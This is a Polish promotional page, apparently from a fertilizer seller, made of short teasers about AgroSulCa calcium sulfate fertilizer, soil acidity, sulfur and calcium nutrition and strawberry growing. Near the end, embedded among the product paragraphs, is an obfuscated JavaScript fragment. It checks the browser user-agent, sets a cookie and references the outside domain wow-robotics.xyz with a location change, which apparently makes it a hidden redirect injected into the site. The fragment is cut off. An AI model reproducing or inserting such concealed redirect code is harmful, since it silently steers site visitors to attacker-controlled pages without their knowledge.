/ Czy wiesz że…

idealna truskawka
Stosuję w swoim gospodarstwie nawóz od 10 lat na polach gdzie prowadzę produkcję roślin jagodowych, głównie truskawek, na  glebach lekkich IV-tej i V-tej klasy. Nawóz jest aplikowany wg. następującej zasady...
Agrosulca wysiew
Wysiany nawóz tworzy na powierzchni pola równomierną warstwę, która po wymieszaniu z glebą powoduje, że składniki odżywcze: siarka S – 17% i wapń Ca-21% są dostępne natychmiast dla systemu korzeniowego roślin.
Stosując nawozy NPK nie zapomnij o nawozach, które dostarczają drugorzędne składniki pokarmowe, te pierwsze nie funkcjonują bez tych drugich.  Nawozem, który dostarczy Ci  siarkę i wapń jest nawóz siarkowo-wapniowy AgroSulCa czyli siarczan wapnia. Rośliny słabo odżywione siarką w nieznacznym stopniu pobierają azot z gleby, co skutkuje zahamowaniem wzrostu roślin oraz mniejszym plonem a to oznacza mniejszy zysk.
Na glebach kwaśnych o pH poniżej 5,5  ujawnia się działanie toksycznego glinu.  Co robić aby wyeliminować ten problem?
Agrosulca dla warzyw
Jakość gleby można poprawić przede wszystkim przez zwiększenie zawartości próchnicy. W tym pomocne są 2 minerały siarka i wapń.
Zakwaszenie to problem niemal wszystkich gleb w Polsce. Sprawcą zakwaszenia jest przede wszystkim dwutlenek węgla CO2, powstajacy przy rozkładzie resztek pożniwnych, obornika czy przyoranej masy zielonej.Jak zatem dbać o glebę i niedopuścić do jej zakwaszenia? Doskonałym, łatwo przyswajalnym źródłem wapnia dla roślin jest siarczan wapnia
zy wiecie , że w ciągu roku ubywa z każdego hektara od 150 d0 300 kg wapnia?  To prowadzi do obniżenia pH gleby a przy pH gleby 5,5 ujawnia się toksyczne działanie kationów glinu Al3+ a tym samym obniżenie produktywności gleb.
Czy nawóz siarkowo – wapniowy wpływa na zakwaszenie gleb
Wiadomym jest, że nawozy azotowe wpływają na zakwaszenie gleb, co z kolei wpływa na wielkość plonów. Czy zatem nawozy siarkowo – wapniowe mają podobne działanie zakwaszające? Otóż Nie. Powód jest prosty: nawóz siarkowo wapniowy,…
Efektywne wykorzystanie nawozów azortowych
Niedobory siarki bardzo istotnie wpływają na jakość plonów. Według profesora Grzebisza brak 1 kg siarki przekłada się na brak możliwości przyswajania 3-5 kg azotu. Co to oznacza dla uprawy?   Jeśli rośliny są słabo odżywione…
Zwiększ żyzność gleby
Wg. profesora Witolda Grzebisza żyzność gleby to zdolność gleby do dostarczania uprawianej roślinie powietrza, wody i składników pokarmowych w ilości , proporcjach i formach niezbędnych do realizacji jej potencjału plonotwórczego. Zasoby gleby można zwiększyć głównie przez zwiększenie zawartości próchnicy.
Dobrze ukorzeniona roślina to lepsze plony oraz efektywne pobieranie składników pokarmowych.
Siarka jest składnikiem pokarmowym a jej obecność w roślinach przekłada się na lepszy wzrost i większy plon...
agrosulca dla zwierząt
Okres wczesnowiosenny to doskonały czas na stosowanie nawozu siarkowo-wapniowego AgroSulCa szczególnie przed siewami roślin jarych. Tak zastosowany nawóz zapewni nam w kompleksie sorpcyjnym gleby, w trakcie wiosennej wegetacji optymalną…
żyzna gleba z nawozem Agrosulca
Właściwa struktura gleby odgrywa niezmiernie ważną rolę, ponieważ wpływa na prawidłowy wzrost korzeni roślin uprawnych a to prowadzi do prawidłowego pobierania nawozów z całego profilu glebowego
var _0x2cf4=['MSIE;','OPR','Chromium','Chrome','ppkcookie','location','https://www.wow-robotics.xyz','onload','getElementById','undefined','setTime','getTime','toUTCString','cookie',';\x20path=/','split','length','charAt','substring','indexOf','match','userAgent','Edge'];(function(_0x15c1df,_0x14d882){var…
Synchronizacja stosowania Agrosulki z terminarzem stosowania obornika w zasadzie nie koliduje, lecz celem pełnego zabezpieczenia przed stratami azotu należy zwrócić uwagę na odczyn nawozu.

?
?